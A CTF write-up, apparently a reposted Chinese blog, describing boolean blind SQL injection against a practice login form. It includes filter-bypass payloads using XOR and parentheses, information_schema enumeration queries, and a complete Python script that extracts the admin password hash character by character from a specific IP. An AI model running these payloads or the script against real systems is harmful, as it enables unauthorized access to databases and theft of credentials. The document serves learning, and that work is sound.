python sql注入漏洞 ctf_CTF-WEB 一个登录框SQL盲注
一些師兄給了個平臺,最近學了很多SQL注入和編寫腳本的知識,躍躍欲試,結果這一做就是漫漫長路,還是很多東西不熟悉啊。
首先找注入點:
發現用戶名錯誤和密碼錯誤會分開提示,可以用布爾盲注,(*^▽^*)好高興。
但是發現,過濾了?空格和 *號,沒關系,用括號繞過(這一下搞死我了)
開始嘗試編寫腳本,結果發現簡單的reuqests解析不了
標簽下的內容沒辦法? ?又去學習一下“美麗的湯”?Beautifulsoup 解析網頁
首先放上一段測試代碼:
# -*- coding:utf-8 -*-
from bs4 import BeautifulSoup
import requests
session = requests.Session()
paramsPost = {"password":"1","username":"admin"}
headers = {"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Upgrade-Insecure-Requests":"1","User-Agent":"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0","Referer":"http://152.136.63.75:8002/","Connection":"close","Accept-Language":"zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3","DNT":"1","Content-Type":"application/x-www-form-urlencoded"}
cookies = {"PHPSESSID":"f1jb3rhc5ebhv1gf7q943bb413"}
res = session.post("http://152.136.63.75:8002/", data=paramsPost, headers=headers, cookies=cookies)
res.encoding = 'utf-8'
print("Status code: %i" % res.status_code)
#print("Response body: %s" % response.content)
soup = BeautifulSoup(res.text,'html.parser')
result = soup.find_all(text = '密碼錯誤')
print(result)
print(type(result))
Output:
這里可以使用Burp?suite?一個插件??Reissue Request Scripter? ?快速生成reuqests頭部?加快寫腳本時間
之后就是構造語句的環節了,可以在本地上用SQL查看器中去檢查自己的命令是否正確,因為括號真的很多,需要不斷去嘗試
這里也總結了一些教訓,可以先用一個記事本,把payload一個一個記下來,把查詢的語句和判斷語句分開:
#最后拼接的主體部分
admin'^1^(ascii()={})
#substr來確認數據
substr(( ),{},1)
#查詢語句
select(group_concat(table_name))from(information_schema.tables)where(table_schema)=(database())
#最后每更換一次查詢語句再將全部組合起來(這個查列名的語句錯到我懷疑人生)
admin'^1^if((select(length(group_concat(column_name))=%d)from(information_schema.columns)where(table_schema)=(database())and(table_name)='admin'),1,0)#
在這里要主要爆長度的判斷:(這里也是一個易錯點)
#一定要將select (length() = '')
select * from users where id =1^if((select(length(group_concat(table_name))
= ' ')from(information_schema.tables)where(table_schema)=(database())),1,0);
#錯誤語句
select * from users where id =1^if((select(length(group_concat(table_name)))from(information_schema.tables)where(table_schema)=(database()) = ' '),1,0);
#無論數字如何最后查出來一定是NULL
判斷的位置不一樣,結果也不一樣,會影響最后結果
貼出腳本:
import requests
import string
str = string.ascii_lowercase+string.ascii_uppercase+string.digits+'-{}+='
from bs4 import BeautifulSoup
session = requests.Session()
paramsPost = {"password":1,"username":" "}
headers = {"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Upgrade-Insecure-Requests":"1","User-Agent":"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0","Referer":"http://152.136.63.75:8002/","Connection":"close","Accept-Language":"zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3","DNT":"1","Content-Type":"application/x-www-form-urlencoded"}
cookies = {"PHPSESSID":"f1jb3rhc5ebhv1gf7q943bb413"}
def name():
flag = " "
for i in range(length()):
for str1 in str:
#paramsPost["username"] = "admin'^1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_schema)=(database())and(table_name)='admin'),{},1))={})#".format (i+1, ord(str1))
paramsPost["username"] = "admin'^1^(ascii(substr((select(password)from(admin)where(username)='admin'),{},1))={})#".format(i+1, ord(str1))
print(str1)
res = session.post ("http://152.136.63.75:8002/", data=paramsPost, headers=headers, cookies=cookies)
res.encoding = 'utf-8'
soup = BeautifulSoup (res.text, 'html.parser')
result = soup.find_all(text='密碼錯誤')
#print(result)
if len(result) != 0:
flag +=str1
break
print(flag)
if(flag[-1] == '}'):
break
print(flag)
def length():
len1 = 0
for i in range(50):
#paramsPost['username'] = "admin'^1^if((select(length(group_concat(column_name))=%d)from(information_schema.columns)where(table_schema)=(database())and(table_name)='admin'),1,0)#" % i
paramsPost['username']="admin'^1^(select(length(password)=%d)from(admin)where(username)='admin')#" % i
res = session.post ("http://152.136.63.75:8002/", data=paramsPost, headers=headers, cookies=cookies)
res.encoding = 'utf-8'
soup = BeautifulSoup (res.text, 'html.parser')
result = soup.find_all(text='密碼錯誤')
print(result)
if len(result) != 0:
len1 = i
break
print(len1)
return len1
name()
一步步報數據,爆出admin的密碼是一個MD5值,
最后發現這道題和Bugku的login3有基本一樣,但是從頭到尾自己做一遍,發現構造語句還是有很多地方不足,SQL盲注這里還有很多練習的。
原文鏈接:https://blog.csdn.net/weixin_45887311/article/details/105739091
總結
以上是生活随笔為你收集整理的python sql注入漏洞 ctf_CTF-WEB 一个登录框SQL盲注的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: springsecurity 登录失败_
- 下一篇: python大气校正_Sentinel-